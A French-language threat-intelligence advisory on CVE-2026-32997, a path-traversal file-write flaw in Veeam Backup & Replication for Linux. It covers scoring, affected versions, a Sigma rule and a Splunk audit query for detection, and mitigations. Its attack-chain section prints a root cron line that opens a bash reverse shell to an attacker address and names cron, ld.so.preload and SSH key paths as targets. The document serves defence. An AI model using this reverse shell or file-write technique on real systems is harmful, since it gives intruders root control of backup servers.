Aller au contenu

CVE-2026-32997 : écriture de fichiers arbitraires dans Veeam Backup & Replication pour Linux

HERMES

HERMES THREAT SCORE & RISQUE INFRASTRUCTURE LINUX

Cible : Service de déploiement et transport Veeam Backup & Replication (Hôtes Linux)
Confiance : 96%
88 / 100
ÉLEVÉ

Mesure la pertinence opérationnelle réelle, la militarisation de l'exploit et la posture de menace active.

Décomposition des dimensions
Exploitabilité 18 / 20
Activité de menace 16 / 20
Militarisation 18 / 20
Exposition 16 / 20
Prévalence 18 / 20
Impact 20 / 20
Maturité de l'exploit 17 / 20
Potentiel d'attaque en chaîne 19 / 20
⚖️ Divergence & Justification opérationnelle

Hermes classe la CVE-2026-32997 à un niveau de criticité élevé (HTS 88). Bien que l'exploitation requière le rôle d'administrateur de sauvegarde au sein de la console VBR, elle neutralise le modèle de confinement du système d'exploitation sous-jacent. Sur les serveurs de gestion et dépôts renforcés sous Linux, un administrateur d'application compromis peut écraser des fichiers critiques du système d'exploitation pour acquérir les privilèges root complets, rendant caduques les mécanismes d'immutabilité matérielle.

🕸️ Graphe de connaissances connecté & Provenance

CVE-2026-32997: Arbitrary File Write in Linux-based Veeam Backup & ReplicationVULNÉRABILITÉ

Nœuds connectés : 1
Relations sortantes actives
→ affectsCOMPOSANTVeeam Backup & Replication
98% VERY_HIGH

Software platform affected by security vulnerabilities and agentic attack patterns.

🔍 Pourquoi cette relation ? (Preuves & Provenance)

“Confirmed security vulnerability in Veeam Backup & Replication documented in Hermes dossier.”

Preuves vérifiées associées :

ParamètreSpécification techniqueImpact opérationnel
Identifiant CVECVE-2026-32997Identifiant standardisé NVD / MITRE
Éditeur / logicielVeeam Software / Backup & ReplicationPlan de sauvegarde et reprise d’activité
Système hôte affectéLinux (Ubuntu, Debian, RHEL, Rocky Linux, SLES)Serveurs VBR et passerelles de transport
Versions affectéesVBR 13.x antérieures à 13.0.2Installations Linux natives
Version corrigéeVeeam Backup & Replication 13.0.2Correctif officiel recommandé
CWE associéeCWE-36 : Absolute Path TraversalDéfaut de cloisonnement du système de fichiers
Privilèges initiauxBackup Administrator (authentifié)Console VBR ou API REST/gRPC
Privilèges finauxroot (superutilisateur local)Contrôle total du système hôte et des dépôts

La faille découle d’un traitement déficient des chemins de destination au sein de l’utilitaire de déploiement et de synchronisation des modules Linux (veeamsvc / VeeamDeploymentService).

Schéma d'exploitation de la CVE-2026-32997 sur serveur VBR Linux :
┌────────────────────────────────────────────────────────┐
│ Administrateur de sauvegarde compromis │
└───────────────────────────┬────────────────────────────┘
│ Requête API DeploymentService
│ Payload : filePath = "/etc/cron.d/backdoor"
▼
┌────────────────────────────────────────────────────────┐
│ Service Veeam sous Linux (Exécuté avec privilèges root)│
│ 1. Réception du flux binaire et du métatag de chemin │
│ 2. Omission de Path.GetFileName() ou chroot jail │
│ 3. Écriture directe : File.WriteAllBytes(filePath) │
└───────────────────────────┬────────────────────────────┘
│ Écriture arbitraire dans /etc/cron.d/
▼
┌────────────────────────────────────────────────────────┐
│ Démon cron système Linux │
│ • Exécution de la tâche planifiée sous UID 0 (root) │
│ • Rétro-connexion vers le C2 / Reverse Shell root │
└────────────────────────────────────────────────────────┘

Lorsque la console initie le téléversement d’un composant auxiliaire (par exemple, un script de vérification de consistance ou un module de transport de données), le service Linux reçoit deux éléments :

  1. Les métadonnées du fichier, comprenant son nom et son chemin de destination théorique.
  2. Le flux binaire représentant le contenu du fichier.

Dans les versions antérieures à la 13.0.2, le code C# exécuté sous l’environnement d’exécution .NET Linux ne vérifiait pas si le chemin spécifié s’échappait du répertoire de travail prévu (/opt/veeam/transport/ ou /tmp/veeam/). L’absence de vérification canonique permettait de fournir un chemin absolu direct (/etc/cron.d/cron_task, /etc/ld.so.preload ou /root/.ssh/authorized_keys). Comme le démon de déploiement Veeam opère avec les privilèges root pour configurer le stockage et les interfaces réseau, l’écriture est effectuée sans aucune restriction de permissions.


3. Chaîne d’attaque et élévation de privilèges

Section intitulée « 3. Chaîne d’attaque et élévation de privilèges »

Un opérateur malveillant ou un groupe de ransomware (tel qu’Akira ou LockBit) ayant préalablement compromis un poste de travail d’administration de sauvegarde peut exploiter cette vulnérabilité en 3 étapes :

  1. Élaboration du fichier de persistance root : L’attaquant prépare un fichier de tâche cron au format standard Linux :
    Fenêtre de terminal
    * * * * * root /bin/bash -c "bash -i >& /dev/tcp/10.10.14.5/4444 0>&1"
  2. Invocation du service de déploiement : À l’aide d’un script Python exploitant les points de terminaison d’administration de VBR, l’attaquant soumet le fichier binaire en indiquant la destination /etc/cron.d/veeam_maintenance.
  3. Exécution du payload : Dans la minute qui suit, le démon cron local interprète la tâche et instancie un shell interactif root connecté au serveur d’écoute de l’attaquant.

Règle Sigma : création suspecte de fichiers par le processus Veeam sous Linux

Section intitulée « Règle Sigma : création suspecte de fichiers par le processus Veeam sous Linux »
title: Écriture de fichier système critique par un processus Veeam Linux
id: cve-2026-32997-veeam-file-write
status: experimental
description: Détecte la création de fichiers en dehors des répertoires standards Veeam par veeamsvc sous Linux
references:
- https://www.veeam.com/knowledge-base.html
logsource:
category: file_event
product: linux
detection:
selection_process:
Image|endswith:
- '/veeamsvc'
- '/VeeamDeploymentService'
selection_target:
TargetFilename|startswith:
- '/etc/'
- '/root/'
- '/usr/bin/'
- '/usr/sbin/'
- '/var/spool/cron/'
filter_legit:
TargetFilename|startswith:
- '/etc/veeam/'
- '/opt/veeam/'
- '/tmp/veeam/'
condition: selection_process and selection_target and not filter_legit
falsepositives:
- Scripts de mise à jour manuelle officiels exécutés hors package manager
level: critical
index=linux_audit (type="SYSCALL" OR type="PATH")
(comm="veeamsvc" OR comm="VeeamDeployment")
(name="/etc/cron*" OR name="/etc/ld.so*" OR name="/root/.ssh/*" OR name="/etc/sudoers*")
| table _time host comm auid uid name success

  1. Mise à niveau immédiate : Appliquer sans délai la mise à jour Veeam Backup & Replication 13.0.2 sur tous les serveurs de gestion et serveurs mandataires Linux.
  2. Cloisonnement des rôles administratifs : Restreindre l’attribution du rôle Backup Administrator uniquement aux opérateurs d’infrastructure dûment habilités. Utiliser des comptes nominatifs distincts des comptes bureautiques.
  3. Durcissement du système hôte Linux : Activer AppArmor ou SELinux en mode Enforcing afin d’interdire aux démons applicatifs Veeam l’écriture dans /etc/cron* et dans les répertoires personnels des administrateurs système.
  4. Surveillance de l’intégrité des fichiers (FIM) : Déployer un agent d’audit (ex. OSQuery, auditd ou Wazuh) surveillant en temps réel toute création ou altération de fichiers dans /etc/cron.d/ et /etc/systemd/system/.